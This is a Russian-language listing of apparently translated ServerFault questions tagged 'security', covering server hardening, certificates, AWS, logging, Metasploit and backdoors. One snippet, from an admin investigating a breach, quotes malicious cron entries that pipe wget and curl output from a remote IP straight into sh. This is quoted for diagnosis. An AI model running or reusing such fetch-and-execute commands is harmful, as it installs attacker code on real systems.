Вопросы с тегом «security»

8
/ dev / shm & / proc закалка

Я видел упоминание о безопасности / dev / shm и / proc, и мне было интересно, как вы это делаете и из чего состоит? Я предполагаю, что это включает в себя /etc/sysctl.conf редактирование некоторого вида права. Как это? kernel.exec-shield = 1 kernel.randomize_va_space = 1...

8
Ограниченная оболочка для управления файлами и git-репозиториями

Подумайте о компании веб-хостинга, которая хочет позволить пользователям управлять файлами и репозиториями git через ssh. Это включает в себя: защищенная копия (scp) создание, копирование, перемещение / переименование и удаление файлов выполнение небольшого набора команд для управления исходным...

8
Нужно ли покупать второй подстановочный сертификат для субдомена?

У нас уже есть сертификат подстановочного знака для *.mycompany.com. В нашей сети есть хосты, которые доступны только внутри. Все они принадлежат internal.mycompany.comподдомену. Существует частный сервер с именем хоста, server.internal.mycompany.comна котором я развернул наш подстановочный...

8
Цены на ключевые пары и группы безопасности на AWS?

Срок действия моей бесплатной учетной записи AWS истек. Я удалил все ресурсы S3 и EC2, но я забочусь, если смогу покинуть Key Pairsи Security Groupsне платить за них. (Ресурсы моей учетной записи теперь выглядят так: Ресурсы ) Документация Amazon, похоже, не упоминает эту проблему. Эти ресурсы...

8
Это плохая идея, чтобы остановить запуск ненужных служб

У меня есть выделенный сервер Debian. Я пытаюсь обезопасить его, и я подумал, что было бы неплохо закрыть сервисы, которые мне не нужны, например, FTP. Я предлагаю запустить что-то вроде этого при развертывании: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f vsftpd...

8
Как настроить агрегатор журналов для аутентификации данных?

Предыстория : удаленное объединение журналов рассматривается как способ повышения безопасности. Как правило, это устраняет риск того, что злоумышленник, взломавший систему, сможет редактировать или удалять журналы, чтобы сорвать судебный анализ. Я изучал параметры безопасности в общих инструментах...

8
Почему вы должны отключить сетевой вход для локальных учетных записей?

Этот вопрос относится к ветке @ SwiftOnSecurity в Twitter: https://twitter.com/SwiftOnSecurity/status/655208224572882944. Прочитав ветку, я все еще не совсем понимаю, почему вы хотите отключить сетевой вход в систему для локальных учетных записей. Так вот что я думаю, пожалуйста, поправьте меня,...

8
Metasploit: модуль кеша базы данных еще не построен, используя медленный поиск

Свежий метасплоит на kalilinux 2016 (последняя стабильная версия) systemctl start postgresql OK На msfconsole msf > db_status [*] postgresql connected to msf Когда я запускаю поиск msf > search samba [!] Module database cache not built yet, using slow search Поэтому я перестраиваю кеш ... msf...

8
Пароль администратора MariaDb не работает

Я только что установил MariaDbна свежий Ubuntu Gnome и впоследствии запустил mysql_secure_installation, где я установил приличный пароль администратора, удалил анонимного пользователя и т. Д. После этого я понял странное поведение в отношении пароля администратора: Если я пытаюсь войти с моей...

8
Простое решение для получения уведомления, когда определенные события появляются в журналах Windows [закрыто]

Закрыто. Этот вопрос не по теме . В настоящее время он не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он соответствовал теме отказа сервера. Закрыто 3 года назад . Какой самый простой способ получить уведомление, когда определенные события появляются в журналах Windows -...

8
Атака сценария оболочки на сервер Apache через cron неизвестного происхождения

Во время запуска проекта войны на сервере Apache Tomcat я обнаружил, что сервер был взломан. Пока бежит война, неизвестный cronбежит вот так [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh...

8
Указание конкретных пользователей или подразделений на определенные контроллеры домена для аутентификации при входе

У меня около 200 пользователей. 50 в Азии, 50 в южной и восточной Европе и около 100 в Западной Европе. Я хотел бы указать 50 пользователей, которые находятся в Азии, на наш DC в Азии, и в настоящее время кажется, что они проходят аутентификацию на наших европейских серверах, что вызывает огромную...

8
Может ли Samhain отслеживать файл, который не существует, но может появиться в будущем?

Я хотел бы Самайн контролировать файл, скажем , к примеру, /root/somefile. Этот файл в настоящее время не существует, но я хотел бы получить уведомление, если он будет создан в любой момент. Я добавляю это к samhainrc: [ReadOnly] file = /root/somefile Это заставляет Samhain выдавать следующие...

7
Почему по умолчанию sshd разрешает вход с правами root?

В настоящее время я работаю над тем, чтобы защитить свои серверы от взлома - среди прочего, я получаю множество попыток войти в систему как root по ssh. Хотя я реализовал fail2ban, мне интересно, почему по умолчанию вход в систему root разрешен для запуска? Даже с дистрибутивами, не основанными на...

2
Аренда выделенного сервера, должен ли я арендовать физический брандмауэр?

Я планирую арендовать выделенный сервер для размещения коммерческого приложения, которое должно содержать все необходимое для работы на одном компьютере (внешний интерфейс, серверная часть, базы данных, аналитика, системы резервного копирования и т. Д.). Это действительно упрощенная инфраструктура,...

2
Как избежать PHP Filesman Backdoor

У нас есть сервер, и мы используем его как общий сервер для наших клиентов. Большинство клиентов используют Wordpress, и для него установлена ​​классическая среда LAMP. Мы предоставляем SFTP-доступ каждому клиенту (конечно, с привязанными пользователями). Обычно клиенты изолированы друг от друга...